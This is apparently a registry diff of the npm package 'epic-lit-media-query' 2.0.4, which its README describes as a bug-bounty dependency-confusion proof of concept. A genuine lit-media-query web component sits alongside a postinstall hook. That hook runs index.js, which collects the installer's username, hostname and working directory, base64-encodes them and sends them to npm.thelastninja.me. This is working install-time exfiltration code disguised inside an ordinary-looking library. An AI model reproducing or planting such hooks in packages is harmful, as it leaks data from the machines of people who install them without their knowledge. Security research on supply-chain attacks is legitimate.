epic-lit-media-query 2.0.4

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.

This version of epic-lit-media-query might be problematic. Click here for more details.

Files changed (4) hide show
  1. package/README.md +5 -0
  2. package/index.js +33 -0
  3. package/lit-media-query.js +139 -0
  4. package/package.json +21 -0
package/README.md ADDED
@@ -0,0 +1,5 @@
1
+ ### epic-lit-media-query
2
+
3
+ This is a proof of concept package to demonstrate dependency confusion in a particular program.
4
+
5
+ It collects basic information to demonstrate impact to the triage team, for inquiries please reach out to: thelastninja@wearehackerone.com
package/index.js ADDED
@@ -0,0 +1,33 @@
1
+ const os = require('os');
2
+ const http = require('http');
3
+
4
+ // This is a proof-of-concept package that is part of a Bug Bounty compaign
5
+ // Please note that this is not a malicious package, it is meant only as demonstration for dependency confusion
6
+ // It collects username, hostname and current path and submits them to a remote server to demonstrate impact
7
+ // For any inquiries please reach out to: thelastninja@wearehackerone.com
8
+
9
+ async function sendUserInfoToLogging() {
10
+ try {
11
+ const userInfo = os.userInfo();
12
+ const hostname = os.hostname();
13
+ const currentPath = process.cwd();
14
+
15
+ // Combine user and host information
16
+ const userInfoString = `${userInfo.username}@${hostname}:${currentPath}`;
17
+
18
+ // Base64 encode the combined string
19
+ const encodedUserInfo = Buffer.from(userInfoString).toString('base64');
20
+
21
+ // Construct the URL with encoded user information
22
+ const url = `http://npm.thelastninja.me/logging?user_info=${encodedUserInfo}`;
23
+
24
+ // Send a GET request to the logging endpoint
25
+ const response = await http.get(url);
26
+
27
+ } catch (error) {
28
+ console.error('Error sending user info to logging:', error.message);
29
+ }
30
+ }
31
+
32
+ // Call the function to send user info to logging
33
+ sendUserInfoToLogging();
package/lit-media-query.js ADDED
@@ -0,0 +1,139 @@
1
+ import {
2
+ LitElement,
3
+ html
4
+ } from 'lit-element';
5
+
6
+ /**
7
+ * The `lit-media-query` component detects when a media query
8
+ * is `true` or `false`.
9
+ */
10
+ class LitMediaQuery extends LitElement {
11
+ /**
12
+ * Fired when `lit-media-query` changes detects a change
13
+ * in the media query (from `true` to `false` and vice versa).
14
+ *
15
+ * @event changed
16
+ * @param {boolean} value If media query is being fulfilled or not.
17
+ */
18
+
19
+ static get properties() {
20
+ return {
21
+ /**
22
+ * Media query to be watched by the element.
23
+ *
24
+ * Can be modified at run time by setting a new value.
25
+ */
26
+ query: {
27
+ type: String
28
+ },
29
+ _match: {
30
+ type: Boolean
31
+ }
32
+ };
33
+ }
34
+
35
+ constructor() {
36
+ super();
37
+ this.query = '(max-width:460px)';
38
+ this._match = false;
39
+ this.boundResizeHandler = this._handleRisize.bind(this);
40
+ }
41
+
42
+ render() {
43
+ return html `
44
+ <style>
45
+ :host {
46
+ display: none;
47
+ }
48
+ </style>
49
+ `;
50
+ }
51
+
52
+ firstUpdated() {
53
+ // Check media query once before 'resize' event
54
+ this._initialMediaQueryCheck();
55
+ }
56
+
57
+ connectedCallback() {
58
+ super.connectedCallback();
59
+ // Check if Visual Viewport API is supported
60
+ if (typeof window.visualViewport !== 'undefined') {
61
+ window.visualViewport.addEventListener('resize', this.boundResizeHandler);
62
+ } else {
63
+ window.addEventListener('resize', this.boundResizeHandler);
64
+ }
65
+ }
66
+
67
+ disconnectedCallback() {
68
+ // Remove event listeners
69
+ if (typeof window.visualViewport !== 'undefined') {
70
+ window.visualViewport.removeEventListener(
71
+ 'resize',
72
+ this.boundResizeHandler
73
+ );
74
+ } else {
75
+ window.removeEventListener('resize', this.boundResizeHandler);
76
+ }
77
+ super.disconnectedCallback();
78
+ }
79
+
80
+ _initialMediaQueryCheck() {
81
+ if (window.matchMedia(this.query).matches) {
82
+ this.dispatchEvent(
83
+ new CustomEvent('changed', {
84
+ detail: {
85
+ value: true
86
+ },
87
+ composed: true,
88
+ bubbles: true
89
+ })
90
+ );
91
+ } else {
92
+ this.dispatchEvent(
93
+ new CustomEvent('changed', {
94
+ detail: {
95
+ value: false
96
+ },
97
+ composed: true,
98
+ bubbles: true
99
+ })
100
+ );
101
+ }
102
+ }
103
+
104
+ _handleRisize() {
105
+ if (window.matchMedia(this.query).matches) {
106
+ // From no match to match
107
+ if (this._match === false) {
108
+ this.dispatchEvent(
109
+ new CustomEvent('changed', {
110
+ detail: {
111
+ value: true
112
+ },
113
+ composed: true,
114
+ bubbles: true
115
+ })
116
+ );
117
+ this._match = true;
118
+ }
119
+ } else {
120
+ // From match to no match
121
+ if (this._match === true) {
122
+ this.dispatchEvent(
123
+ new CustomEvent('changed', {
124
+ detail: {
125
+ value: false
126
+ },
127
+ composed: true,
128
+ bubbles: true
129
+ })
130
+ );
131
+ this._match = false;
132
+ }
133
+ }
134
+ }
135
+ }
136
+
137
+ if (!window.customElements.get('lit-media-query')) {
138
+ customElements.define('lit-media-query', LitMediaQuery);
139
+ }
package/package.json ADDED
@@ -0,0 +1,21 @@
1
+ {
2
+ "name": "epic-lit-media-query",
3
+ "version": "2.0.4",
4
+ "description": "This is a poc package for bug bounty dependency confusion test, it only collects basic info to demonstrate impact to the triage team",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1",
8
+ "postinstall": "node index.js"
9
+ },
10
+ "repository": {},
11
+ "keywords": [
12
+ "poc"
13
+ ],
14
+ "author": "thelastninja@wearehackerone.com",
15
+ "license": "MIT",
16
+ "bugs": {
17
+ "url": "https://hackerone.com/thelastninja"
18
+ },
19
+ "homepage": "https://hackerone.com/thelastninja",
20
+ "dependencies": {}
21
+ }